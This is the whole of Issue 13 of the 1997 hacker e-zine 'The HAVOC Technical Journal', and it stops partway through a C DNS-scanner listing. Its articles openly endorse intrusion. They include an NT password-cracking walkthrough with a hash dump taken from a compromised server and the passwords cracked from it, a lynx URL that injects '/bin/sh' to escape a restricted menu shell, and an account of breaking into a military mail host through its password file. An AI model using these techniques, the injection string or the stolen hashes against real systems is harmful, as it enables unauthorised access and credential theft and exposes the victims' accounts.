+------------------------------------------------------------------+
|   The HAVOC Technical Journal   -   http://www.thtj.com   -      |
+------------------------------------------------------------------+

Vol. 2 | No. 1 | August 1st, 1997 | A HAVOC Bell Systems Publication
Issue 13                                          "Expand your mind."
_____________________________________________________________________________

-[The HAVOC Technical Journal Issue 13]-

Editorial..............................Scud-O
NT Hacking.............................WaRsPrItE
Breaking out of Freenet Menu Shell.....N-TREEG
How to hack military e-mail servers....WaRsPrItE
DNS Scanner - dns.c....................memor
Connection Hijacking Attack............Merde Fuk
One method to keep root................WaRsPrItE
Carding..more basics for the lame......ArcAngl
Cellular Programming Archives, Pt. I...Phrax
Basic Social Engineering...............WaRsPrItE
DTMF Decoding..........................ArcAngl
Redneck Phreaking......................shoelace
Basic UNIX Scripting...................WaRsPrItE
KEEPING UP WITH THE TELCOS.............ArcAngl
The Weather Report: Federal Numbers....WeatherM
Fake IDs...............................N-TREEG
Oddville, THTJ.........................Scud-O
The News...............................KungFuFox
Logs...................................THTJ
-------------------------------------------------
_____________________________________________________________

The HAVOC Technical Journal - Information
- Editor in Chief   : Scud-O, scud@thtj.com
- Assistant Editor  : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@thtj.com
- THTJ website: http://www.thtj.com
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784

The HAVOC Technical Journal Vol. 2, No.1, August 1st, 1997. A HAVOC Bell
Systems Publication. Contents Copyright (c) 1997 HAVOC Bell Systems
Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or in part without
the expressed written consent of HAVOC Bell Systems Publishing. [No copying
THTJ, damnit.]

The HAVOC Technical Journal does in no way endorse the illicit use of
computers, computer networks, and telecommunications networks, nor is it to
be held liable for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we do endorse that
stuff. We just don't wanna get in trouble if you try it for yourself and
something goes wrong.]

For information about using articles published in THTJ, send mail to:
  e-mail: thtj@thtj.com
  mail:   THTJ c/o HBS, PO Box 448, Sykesville, MD 21784
_____________________________________________________________

[Editorial : by Scud-O]

Expanding one's mind

This month I would like to talk to you about a topic that needs to be
addressed. We as a species have begun to slow our development. Nature
leaves survival to the fittest, but with today's technology, more people
than we should have survive. This may sound great, but for a species to
advance, we need to have this survival of the fittest. The best way I can
see to accomplish this is by expanding one's mind. A fast mind can own a
fast body any day.

Now, by being a hacker you do show a drive to expand your mind. And this
is good, but only 'real' hacking (i.e. finding new holes, working to trace
connections and data flow through machines is real hacking to me). Mail
bombing and anarchy are not hacking; they do not expand one's mind.
Cookbook hacking is also not a method to expand your mind. By using a
'cookbook' to hack you are in fact shutting your mind off. You are simply
following directions, and what serious thought is expended on that? None.

Expanding your mind uses all of your senses. Expanding your mind extends
to more than just hacking. New experiences help to increase your
knowledge, and thus your mind. Try new things.
If early cave men had not rubbed two wooden sticks together, would we have
fire? No. And where would we be today if we had not discovered fire? Still
in a cave. Our minds are waiting to be expanded. We still have 90% of our
brain left to use up. If we don't expand ourselves, it would be an awful
waste of space, would it not? So go on, expand yourself.

Scud-O, Founder and Editor in Chief of THTJ

+----------------------------------------+
Scud-O and HBS would like to hear your views on this issue. Please feel
free to e-mail us at: scud@thtj.com
----------------------------------------------
[HBS ASCII logo]
-of HAVOC Bell Systems-
scud@thtj.com | http://www.thtj.com
-------

+------------------------------------------------------------------+
|   The Playlist   -   by Scud-O   -   for July 1997   -           |
+------------------------------------------------------------------+

This list comes from Scud-O's house and car stereos, and these were his
most played CDs during the month of July. These are not organized in any
way; it is just written up as Scud-O finds the CDs lying around his house.

Artist                      Title
------                      ----------------
Various                     Saturday Night Fever Soundtrack
Various                     sm:)e mix session 1 by dj scott henry
Atari Teenage Riot          Burn, Berlin, Burn!
The Future Sound of London  Accelerator
The Future Sound of London  Dead Cities
Various                     Songs in the key of x ( X-Files )
Fugees                      The Score
Squirrel Nut Zippers        Hot
Beck                        Odelay
The Prodigy                 Experience
The Prodigy                 Music for the Jilted Generation
Prodigy                     The Fat of the Land
Soul Coughing               Ruby Vroom
Soul Coughing               Irresistible Bliss
wyclef jean                 The Carnival
Adam Sandler                They're all gunna laugh at you!
Various                     MTV's amp

Next Month: Scud-O's entire CD collection (god, is that gunna take a while
to type up!)
_____________________________________________________________

NT Hacking
by WaRsPrItE

===================================
=            Contents             =
===================================
I.   WaRsPrItE's talk on NT Hacking
II.  Info on the pwdump Utility
III. Info on L0phtCrack
IV.  The Password file tested
V.   Results
===================================

I. WaRsPrItE's talk on NT Hacking
-----------------------------------
-----BEGIN PGP SIGNED MESSAGE-----

First off, I'd like to say that I think that this is an excellent utility
for checking the security of NT networks. However, just like the now
infamous and much over-hyped "SATAN", it's not the skeleton key into any
NT network. As I say in every fucking article I write, the key is in the
basics. If users pick good passwords then they are hard to crack. For
example, if you use upper case, lower case and numbers then a 14 character
password has 62^14, about 1.24 x 10^25, possible combinations. Now add
some punctuation to that! Remember that in NT the password can be up to 14
characters as opposed to the 8 that *NIX crypt(3) looks at. Just to put
that in perspective, the sun will go nova in about 1.0 x 10^10 years, and
it takes about 1.0 x 10^21 years for all orbits to decay by gravitational
radiation. So needless to say my little brute force attack was futile at
best :).

One caveat that the L0pht advisory reproduced below spells out, though:
the LANMAN hash upper-cases the password and hashes it as two independent
7 character halves. As long as NT stores that LANMAN hash next to the MD4
one, nobody is searching 62^14 at all; the job is two searches of at most
36^7 (about 7.8 x 10^10) each, and a 6 character password sits well inside
that. The 14 character limit buys nothing until the LANMAN hash is gone.

The two programs I used in the attack were L0phtCrack and PWDUMP. I must
say that PWDump [by Jeremy Allison, jra@cygnus.com] works beautifully,
provided you're logged in as "administrator". So why use it to hack then?!
Because it'll work on any copy of a registry! If you can swipe some backup
media from the server room that might have a copy of the registry on it
:). The NT I exploited, and whose password hashes I included in this zine,
I hacked because the moron sysadmin allowed Domain users to log on locally
on the server. During installation NT asks if you want to make emergency
repair disks (rdisk.exe) and the default choice is "yes".
Every time you run rdisk, NT stores a copy of the Registry in
%SystemRoot%\Repair (the SAM and SECURITY hives there are only refreshed
when rdisk is run with /s; otherwise they are the copies from setup), and
the default permission on that directory gives normal users read access.
Piece of cake to get a copy of the registry. The problem is that any
passwords that have been changed since the last time rdisk was run won't
work (minor glitch). The hives in Repair are stored compressed (sam._), so
expand them before doing anything else with them. If you administer a box
like this, run cacls %SystemRoot%\Repair and revoke the read access that
Everyone and Users get by default.

Now that you have a copy of the registry, what do you do with it? Well,
find an NT machine that you can log in to as "administrator" and run
PWDump.exe. Note that pwdump reads the registry of the machine it runs on
(or of a \\machine it has rights to), not an arbitrary file, so the copied
hives have to be put in place of that machine's own before pwdump will see
them. In this case I brown-nosed some warez types and installed it at home
:). After that it's pretty simple: run L0phtCrack.exe with your favorite
wordlist or use it in brute force mode. It took me 6 days on a Pentium 133
to get three accounts. Amazingly, it got passwords that were 6 characters
long! Kudos to L0pht!

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBMeMcqX5eXk/jGmY7AQH1yQf/YFpgsAk7iIPEcfOUTiUJ17O2KhujgSfl
8xZgC7gIHR98uzSwqlJerXQlYUFUfNj7CZvO2/SJMeV8bU/bLFF7Ki9zmo+57vkH
z6HfzcF4Wyy/o7y854jOQBPfsXQd6+Nbivc1l1sriaQ4H25hxhLkXA1UFchWD9hk
8xv5nSDPZxlCHobWau/sK+Of92DfFQV1Fw2v5Kyeo0jiWZItaghlMvfYu3eeGtQ0
8sTNg4BDiHQeoQ9/cG+zapKa6UZcPZLyQHXCF36zz23Rtm7bC0jMqUv5BONgWk4W
cuptOS+pmZqsDhf3XWPEHTaugZSluEGUd9A34siF/wjmGwgXN8cO9w==
=yiB2
-----END PGP SIGNATURE-----

II. Info on the pwdump Utility
-------------------------------

Windows NT Password Dump Utility
--------------------------------

This handy utility dumps the password database of an NT machine that is
held in the NT registry (under
HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users) into a valid
smbpasswd format file. This should be a help to Samba administrators who
have a master password database on a Windows NT machine and need to keep
this in sync with the smbpasswd file on their UNIX/Samba server.
This utility dumps NT password entries in the format :

  <user>:<id>:<lanman pw>:<NT pw>:comment:homedir:

Where <user> is the user-name on Windows NT, <id> is the Windows NT RID
(relative ID) - the last 32 bit component of the Windows NT user's SID,
<lanman pw> is the user's lanman password hash, <NT pw> is the user's
Windows NT (md4) password hash - note that if the user has no password
these will be dumped as the string 'NO PASSWORD*****'; if the account is
disabled or invalid these are dumped as 32 '*' characters. The comment is
a concatenation of the user's full name on Windows NT and the description
field in the Windows NT user-manager program. The homedir cannot contain
':' characters unfortunately, as these are used as field separators in the
smbpasswd file (as per UNIX), so all ':' characters after drive letters
are dumped as '_' characters.

How to use pwdump
-----------------

Only as a suggestion, I would recommend dumping your NT machine's account
database and then creating regular UNIX users (in /etc/passwd) with the
same UNIX account numbers as their NT RID - this will make replicating the
smbpasswd file much easier later on. These /etc/passwd accounts may have
disabled password entries, prohibiting the NT users from logging onto the
UNIX box via telnet (this is similar to removing the 'log on locally'
right on an NT server). This will not prohibit them from using the Samba
box as a server via Samba though.

The created smbpasswd file may then be copied to the
$SAMBA/private/smbpasswd file (where $SAMBA is the base directory you
installed Samba into). If Samba is set up for user level security and
encrypted passwords (set :

  security = user
  encrypted passwords = yes

in your smb.conf file) then Windows NT / 95 users who have logged on to
the NT domain will be able to transparently access the resources on the
Samba box as their correct UNIX user ids (the ones you originally created).
You can then set up an 'AT' job on your NT server to periodically dump
your NT password database into a new smbpasswd file and copy it over
(securely somehow) to the Samba server to keep the password databases on
the two machines in sync.

The pwdump.exe utility can take a \\machine name as argument; it will then
proceed to dump the password database from that machine instead of the
local machine, if it has sufficient privileges to do so. By default it
will dump the password database of the local machine.

NOTE: The passwords dumped by this utility are 'plain-text equivalent' in
the CIFS protocol and *MUST* be protected. The UNIX security on the
smbpasswd file *MUST* be set to (owner root, permissions rw------- - ie.
read/write owner, no access to anyone else).

Future Enhancements
-------------------

As this code decrypts the obfuscation step in the NT password database it
may be reversed, allowing a lanman and md4 hash to be written into the NT
registry for a user account. This would allow a UNIX/Samba box to be the
master repository for user account details, and the account passwords to
be replicated and 'brute forced' into the NT password database, bypassing
the rather baroque NT API mechanisms. This code doesn't attempt to do this
however; this is left as an 'exercise to the reader' (or an enterprising
university somewhere :-).

How it works
------------

This utility takes great pains to maintain NT security as it wanders
through the NT SAM areas of the registry. It will not even run if you are
not running as Administrator. Firstly it goes through and adds the
'minimum necessary change' (see Asimov's 'The End of Eternity' :-) to
allow the program to read the password entries. It dumps the user entries
(see the code for details) and then goes back through the registry
restoring the security on all the keys it touched.
I have tested this code on NT Server/Workstation 4.0 and NT 3.51 and have
never had problems, but as always, this code has *NO GUARANTEE*
associated.

Source code
-----------

The source code for this utility may be found in

  ftp://samba.anu.edu.au/pub/samba/pwdump/pwdump.c

Note that this code needs a DES library to compile. The one I used in
development is Eric Young's excellent DES library found at :

  ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-4.01.tar.gz

which compiles fine under Windows NT. I used Microsoft Visual C++ 4.x as
the compile environment. The code pwdump.exe is provided for people who do
not have a compiler and is a binary of the program for x86 NT machines
(are there any other kind :-).

Please report all bugs to : Jeremy Allison, jra@cygnus.com

libdes, Version 4.01 13-Jan-97

Copyright (c) 1997, Eric Young
All rights reserved.

This program is free software; you can redistribute it and/or modify it
under the terms specified in COPYRIGHT.
--
The primary ftp site for this library is
  ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-x.xx.tar.gz
libdes is now also shipped with SSLeay. Primary ftp site of
  ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.x.x.tar.gz

The best way to build this library is to build it as part of SSLeay.

This kit builds a DES encryption library and a DES encryption program. It
supports ecb, cbc, ofb, cfb, triple ecb, triple cbc, triple ofb, triple
cfb, desx, and MIT's pcbc encryption modes and also has a fast
implementation of crypt(3). It contains support routines to read keys from
a terminal, generate a random key, generate a key from an arbitrary length
string, read/write encrypted data from/to a file descriptor.

The implementation was written so as to conform with the manual entry for
the des_crypt(3) library routines from MIT's project Athena.

destest should be run after compilation to test the des routines. rpw
should be run after compilation to test the read password routines.
The des program is a replacement for the sun des command. I believe it
conforms to the sun version.

The Imakefile is setup for use in the kerberos distribution.

These routines are best compiled with gcc or any other good optimising
compiler. Just turn your optimiser up to the highest settings and run
destest after the build to make sure everything works.

I believe these routines are close to the fastest and most portable DES
routines that use small lookup tables (4.5k) that are publicly available.
The fcrypt routine is faster than ufc's fcrypt (when compiling with gcc2
-O2) on the sparc 2 (1410 vs 1270) but is not so good on other machines
(on a sun3/260 168 vs 336). It is a function of CPU on chip cache size.
[ 10-Jan-97 and a function of an incorrect speed testing program in ufc
which gave much better test figures than reality ].

It is worth noting that on sparc and Alpha CPUs, performance of the DES
library can vary by up to 10% due to the positioning of files after
application linkage.

Eric Young (eay@mincom.oz.au)
----

III. Info on L0phtCrack
-----------------------

L0pht Security Advisory

Advisory released April 10 1997
Program: L0phtcrack.exe - Windows NT password insecurities
Vulnerability Scope: Windows NT
Severity:

The L0pht is pleased to release L0phtcrack rev 1. This program recovers
the LANMAN and/or NT Dialect MD4 plaintext password from output derived
from the SAM registry.

Authors: mudge@l0pht.com weld@l0pht.com

Intro:

This tool, as with many others, can be used for breaking into systems in
illegal fashions - THAT IS NOT WHAT IT IS INTENDED FOR! We had a working
version done the same day that PWDump was released in order to audit some
of our internal networks. However, as we started researching more into it
we noticed many shortcomings in how MS security is handled and present
some of these in our tool. We take no responsibility for misuse of this
information.
It is our belief that the only way to protect yourself is to fully
understand your vulnerabilities. Unfortunately, for some of these problems
we still don't see immediate solutions. Our particular solution has been
to trust our users, and not let any of our NT machines talk to the
internet (ie filtered very tightly at the perimeter). We are interested in
other solutions.

Overview:

Recently several NT password crackers have emerged. We offer this one
with the belief that it offers some features and functionality that the
current ones do not have.

L0phtcrack will recover passwords from Windows NT registries in a variety
of fashions. By feeding in the output from PWDump [by Jeremy Allison,
jra@cygnus.com] and a dictionary file, L0phtcrack rev 1 will attempt to
retrieve:

 1) only the LANMAN plaintext password
 2) only the NT Dialect MD4 plaintext password [see reasoning below]
 3) Both the LANMAN and MD4 plaintext passwords (by deriving the MD4
    password from the LANMAN output and running through up to 2 to the
    Nth power permutations)

Alternatively, L0phtcrack gives you the capability to _brute force_ the
entire key space and recover ALL USER PASSWORDS up to 14 characters in
length. By going through the entire keyspace available, this program WILL
RETURN ALL OF THE PLAINTEXT PASSWORDS (both LANMAN and MD4) up to and
including 14 characters in length (note that the User Login Dialog box on
NT machines limits the amount of characters that can be typed to 14 for
the MD4 dialect. Future releases of this software will enable brute
forcing of up to 16 characters for MD4).

L0phtcrack comes in three flavours:

 1) A nice Windows GUI interface so you can point and click.
 2) A CLI version for running in "DOS" windows.
 3) Source code that is generic enough to build on most Un*x's.

Description:

Here's how it works -

For NT, LANMAN passwords are derived in the following fashion:

 . The user password is converted to UPPERCASE.
 . If the user password is less than 14 bytes, the password is padded
   with NULL characters to 14 bytes.
 . If the user password is greater than 14 bytes, the password is
   truncated to 14 bytes.
 . The 14 byte string is split down the middle into two 7 byte strings.
 . One 8 byte odd parity des key is derived from each of the 7 byte
   strings [note1].
 . The constant 'magic value' [note2] is then encrypted first with the
   first odd parity des key and then with the second. The results are
   concatenated. This is the LANMAN OWP [note3].

[note1: There is a significant loss of bits in the str_to_key functions
which derive the 8 byte odd parity DES keys from the 7 byte strings. This
knocks down the possible key space to attack DES substantially. Thanks to
Hobbit@avian.org for pointing this out to us]

[note2: the constant 'magic value' is derived from the encryption of
0x4B47532140232425 with a key of all 1's]

[note3: quickly scanning the LANMAN OWP's it is easy to see who has
passwords that are 7 characters or less. If the second half of the LANMAN
OWP is 0xAAD3B435B51404EE the values for the last seven characters in the
user password were all NULLs.]

For NT, NT Dialect MD4 passwords are derived in the following fashion:

 . The user's password is converted to Unicode [note4].
 . The unicode password is run through MD4 to return a 16 byte value.
   This is the MD4 OWP [note5] [note6].

[note4: There is a large amount of confusion as to where Unicode stops.
i.e. is "ABC", which is in actuality 'A','B','C','\0', encoded as
'A' '\0' 'B' '\0' 'C' '\0' or 'A' '\0' 'B' '\0' 'C' '\0' '\0' '\0'. We
find that in this situation the former is the case.]

[note5: You might say "why do you even bother having an option of doing
_only md4_ when it is much quicker to derive it from the LANMAN password".
To which we would reply "this gives us the ability to easily roll in the
ability to dictionary attack traffic that we see on the network.
This will be particularly important if the proposed changes to the CIFS
spec go into place. See our S/Key cracker MONKEY for more of an idea on
what's to come".]

[note6: For those who were building md4 crypt-n-compare engines from
inside Microsoft's Visual C++ IDE. The VC++ does not by default define
_MSDOS_, or 8086 which are necessary to throw the byte ordering into the
correct mode in md4.c]

What we do in rev 1 -

In rev 1 of l0phtcrack the user must hand in a password file in the format
of Jeremy Allison's PWDump output. From this the following actions can be
taken.

LANMAN only - A dictionary is fed in and each word is encrypted using the
LANMAN one round DES format as described above. The list of users is
checked against this encrypted OWP. Any that are found matching are
flagged.

MD4 only - A dictionary is fed in and each word is encrypted using md4.
The list of users is checked against this encrypted OWP. Any that are
found matching are flagged. See the description of rev 2 for why this
option is important.

LANMAN and md4 - A dictionary is fed in and each user is first checked
against the LANMAN one round DES OWP. If a match is found, the word is run
through 2 to the power of strlen(word) case permutations in md4 to return
the case sensitive md4 value.

Brute force - An input string containing the list of valid characters is
run through sequentially in all possible combinations up to 7 characters
in length. The first half and second half of the LANMAN password are
compared against these, thus returning all passwords up to 14 characters
in total length. Since the logon screen will not allow you to enter more
than 14 characters, even though the NT MD4 dialect will allow up to 128,
this should return all users' passwords. When a match is found the word
is run through 2 to the power of strlen(word). By changing the default
string that is processed through you can drastically change the amount of
time it takes to brute through the entire keyspace.
Keep in mind that the following characters are not valid in passwords so
they don't need to be included: '/', '\', '[', ']', ':', ';', '|', '=',
',', '+', '*', '?', '<', '>' [according to the MS technet information].
For example: if you just want to check all combinations of letters all
you have to run through is ABCDEFGHIJKLMNOPQRSTUVWXYZ. rev 2 will have
this optimized a bit more, in addition to allowing a remote query to our
tables of precomputed hashes, thus reducing the problem to that of a table
lookup.

Why is it important to be able to attack md4 only? That is much slower!

The changes being made to the CIFS spec imply that in the future a server
will be able to force a client to use the NT dialect and not negotiate
down. Based upon how the "key exchange" is done this will be attackable
via the hooks put in for md4 only much in a similar way that our program
"MONKEY" will attack s/key sessions based upon promiscuously viewed
network traffic.

errata in rev 1 -

Several of the routines need to be optimized a bit more but the tool is
quite usable and quite fast as it is (100 users and an 8 meg dictionary
file took under 1 minute on a PPro 200 with the GUI version. The CLI is
slightly faster - the bruting with a string of
"ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789-_" took a little over 3 days on a
P133). There are hooks to preen through the user list and instantly kick
out whether a user has a password of 7 characters or less, or if a user's
password is greater than 7 chars. If you specify md4 only it just does a
straight dictionary crypt and compare; if you specify any other method
that returns md4 values it runs through all case possibilities. The brute
forcer is not implemented in the windows GUI version. Use the command line
version for this functionality.

What you can expect to see in rev 2 -

 . The functionality of PWDump will be included in the l0phtcrack program
   so you won't need to run separate programs.
 . You should be able to pull down registries from remote / local
   machines WITHOUT BEING ADMINISTRATOR and WITHOUT NEEDING TO KNOW THE
   ADMINISTRATOR's PASSWORD [read this bullet item again!!!] - we believe
   we are very close to being able to do this now.
 . You will be able to brute force the NT Dialect password up to 16
   characters in length for those tricky network users that never log in
   via the console.
 . The windows GUI will be multi-threaded to take advantage of multiple
   processors for dramatically improved brute forcing.
 . We should have pre-computed tables of the entire key-space available
   so all that needs to be done is a remote table look up.

L0phtcrack is freely available from the l0pht advisories page:

  http://www.l0pht.com/advisories.html

screenshots should be available on the web page in the next couple of
days.

If anyone makes modifications / improvements please mail the diffs to
mudge@l0pht.com.

We hope this tool is useful,

mudge@l0pht.com , weld@l0pht.com
--------------
For other advisories check out http://www.l0pht.com/advisories.html
--------------

IV. The Password file tested
------------------------------

I edited this to cover my ass and for space requirements. But it's still
a valid file for cracking purposes.
Administrator:500:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
Guest:501:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1004:ACAA2B2B4DB1C2F509752A3293831D17:CA45A13FD16012BF33AA68CDFE061FCD:<user name>::
ccrouter:1009:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1010:9C0E16584A1066E6C2265B23734E0DAC:3BC5E21044369A593A461ABB6942A8A5:<user name>::
<user name>:1011:D30B776BDA67C893AAD3B435B51404EE:9507A8AD5A9BDFC54E08F713CB74764F:<user name>::
<user name>:1012:1E074F8EF51098B2AAD3B435B51404EE:4F99B255DB7C1852ED01A80576202901:<user name>::
<user name>:1013:904021AAA178696DAAD3B435B51404EE:E8CD0E4A9E89EAB931DC5338FCBEC54A:<user name>::
<user name>:1014:0A5A9AD4C8774E46C2265B23734E0DAC:6ABC3FA6A76801DFFC63BE7565CFD666:<user name>::
<user name>:1015:3F109A599C4324BD93E28745B8BF4BA6:CA162D1F614293BC30686E0AC2F0E67A:<user name>::
<user name>:1016:7CF5973DF34EA1443B80EEA293B236B6:3E5CC1D5EDB4B91334EFEEF1258D3E50:<user name>::
<user name>:1017:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1018:9EF072AE87B5C9C4AAD3B435B51404EE:6FF0D8A475E5C5B0DFD6A8676F18A829:<user name>::
<user name>:1019:6166F0244140F965AAD3B435B51404EE:ECF1BE0786D6E49470107CAB4E3B3E7B:<user name>::
<user name>:1020:BE4C45E3524EF720F500944B53168930:8BB50ADC452C4EE196775B7B5008B341:<user name>::
Supervisor:1026:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
FPNW Service Account:1027:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1030:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1040:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1041:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1042:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1043:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1044:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1045:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1046:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1047:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1048:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1049:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1051:0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52:<user name>::
test:1061:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1062:6B35A2BA7D7C5B3AAAD3B435B51404EE:3A1B4CFCEB4385D1108253A357B2955E:<user name>::
FILE-SERVER$:1066:79570B2F6875312AA1455905822538D8:D114D50DD21D6ADDEBB008E3231D7A44:::
NT$:1067:07128FE8EEB666E788371ED292FDCCE7:AF7C003BB0917BC28E37F1785E2B9018:::
<user name>:1068:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
IUSR_FILE-SERVER:1069:338C0358DECFDA2902386B2E93EFFD10:9393E296495FDC72CCF951D249BB921F:<user name>::
PLUTONIUM$:1070:C31C1D58633BE3ED27892589E3A13688:26BC63583A0EB0DB6E7C6DCA33F3AB00::

Two things worth reading off this file before running anything against
it. Neither hash is salted, so identical hashes mean identical passwords:
Administrator, Guest and a dozen other accounts share one LANMAN/NT pair,
and ccrouter, Supervisor, FPNW Service Account, test and RID 1068 share
another, so one crack opens all of them. And every LANMAN hash whose
second half is AAD3B435B51404EE (1011, 1012, 1013, 1018, 1019, 1062)
belongs to a password of 7 characters or fewer, per note3 of the advisory.
-----

V. Results
-------------

User: [<user name>]   Lanman PW: [LOBOS1]   NT dialect PW: [lobos1]
User: [<user name>]   Lanman PW: [MANDAR]   NT dialect PW: [mandar]
User: [<user name>]   Lanman PW: [SKIING]   NT dialect PW: [skiing]
_____________________________________________________________

Breaking out of Freenet Menu Shell
compiled by N-TREEG
Source and credit goes to: CERT & General Protection Fault

Freenets are great because of the operative word _FREE_.
But most have extremely restrictive menu shells and for the most part,
they won't give you access to your favorite bourne (bash, csh) shell or
whatnot. That really sucks. Do they not trust us with a fully functional
interactive shell? ;-) Well, I know that another online zine has published
info on how to get to a bourne shell through pine. That took a good bit of
work to set up and get going correctly. I think this method is a lot
easier. All you need is access to lynx. (Being able to cut and paste helps
too if you're as lazy as I am.)

Here's how:

Start up lynx. Hit g (for go to). Enter this into the "URL to open:"
field:

  LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/nul

When it says "Enter a filename:" enter this:

  /dev/null

When it returns "File exists. Overwrite? (y/n)" hit y.

You should hopefully see a beautiful little $ now. There's your local
shell. Have fun. Aren't freenets grand? ;-)

(Why it works: lynx builds a shell command line around the file names it
is handed for the download, so the ';' in the URL ends one command and
starts /bin/sh as the next. If you run a menu shell yourself, later lynx
releases fixed this, and lynx -restrictions=all turns the download and
shell features off regardless.)

"HaX0r3d PerceptionS leases ... THTJ ownz."
N-TREEG
http://www.afn.org/~afn56746
HaX0r3d PerceptionS
_____________________________________________________________

How to hack military e-mail servers....WaRsPrItE

-----BEGIN PGP SIGNED MESSAGE-----

Are our military networks safer than their civilian counterparts? Most
military bases, if not all military bases, have some sort of UNIX server
to route non-classified email. Usually, the machine is identified as
emh(electronic mail host).<basename>.<branch>.mil. It is extremely easy
for military members to get an account on one of these servers: simply
call up and request one. As we all know, military members quite often get
orders to other installations, especially those personnel stationed
overseas. Due to this fact, electronic mail hosts quite often have huge
password files and many of the accounts contained in that file are for
users that "shipped out" long ago and never had their account removed
from the system.
A friend of mine exploited this one night when we discovered the fact that the server also had its security set so that every 6 months a new password containing numbers or punctuation was required. The problem was that the system didn't prompt you for your old password before requesting a new one. We tried connecting to the system via Telnet on a hacked account from a generic ISP with no luck. The good news was that we were overseas and overseas bases have phone systems that are independent of the host nation's system. Meaning there had to be a number to dial to get connected to the base's phone system if you happened to be off the base. This number is relatively easy to get, just call the local base operator and ask for it. The kicker was that the local dumbass jarhead Marine base was still running with X-Bar switching, not ESS like us. So here's what we did....

<Our Base> -> <Jarhead's dial up> -> <Our Dial Up> -> <Mail Host modem>

After that, it was simple, we dialed in with a socially engineered legit account and went to /etc and did a cat of passwd (NOT SHADOW!) and logged it locally. After gaining a listing of accounts on the system we logged off. After that, we just simply tried every login until we found one that was overdue for a passwd change. We then set a password for it and made a note of the account. If we wanted to pursue it further we could have done a finger on the account to see which, if any, other servers the individual had accounts on since the military uses the standard of <first seven characters of your last name + first initial> to determine logins.

I'm not offering this story as an example of my k-rad 3l33t3 skillz. Just to show that simple exploits often work the best. `Nuff said!
WaRsPrItE

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBMd/EOH5eXk/jGmY7AQFz7Af/d/412J9CqTjyes4ojUo0eLT9+3KwEaXd
1aVaB2+rJQ8oTHMWlfdng14IcisQLRuMsUlSwO7Ud4C/y1eELemu98OeqiP/2t+K
9rCbphpBQ9a2Dhv37HeyxH0z+Gh+0eeeBbipAL/NVCgFQYKM8Jdong4BQwsgoCFR
PZo2eDScMCAQSI9a2MY285UnNGQIoeLXmcN626WEFOSYTC9trhXPdciHhsLtVBuT
zZuXzCYMMwC2+YP5IFyZgCMN29yw0wCe64hwbwo+/nS4Z0PEXvLsZPJO4oQOC5kU
3P7tp8dvWjun4LP8LBt8806pYNgoQlKCJjxtJAhT752+imONDPefIA==
=V9P6
-----END PGP SIGNATURE-----

_____________________________________________________________

/* By memor / hbs */
/* some dns scanner using */
/* host command */
/* Tested on Linux 2.0.30 */
/* last modified: 29/07/97 */
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <string.h>   /* strlen(), strspn() */

int main(int argc, char **argv)
{
    char commande[80];                      /* define commande as char string (big enough for the host line below) */
    if (argc > 1                            /* if an argument to the command ... */
        && strlen(argv[1]) < 16             /* ... that fits an a.b.c prefix ... */
        && strspn(argv[1], "0123456789.") == strlen(argv[1])) /* ... and holds only digits and dots, so nothing else reaches the shell */
    {
        int compte = 0, pause = 0;          /* define count & pause */
        printf("DNS Scanning from %s.1 to %s.255 \n", argv[1], argv[1]); /* presentation thing */
        sprintf(commande, "date");          /* string "date" in commande */
        printf("DNS Scanning began at this "); /* presentation thing */
        printf("%s :\n", commande);         /* print which command we use (presentation thing) */
        system(commande);                   /* execute command */
        for (compte = 1; compte < 256; compte++) /* counting 1 to 255 */
        {
            printf("Scan: ");               /* presentation thing */
            snprintf(commande, sizeof commande, "host %s.%i 2>/dev/null", argv[1], compte); /* string "host %s.%i 2>/dev/null" in commande */
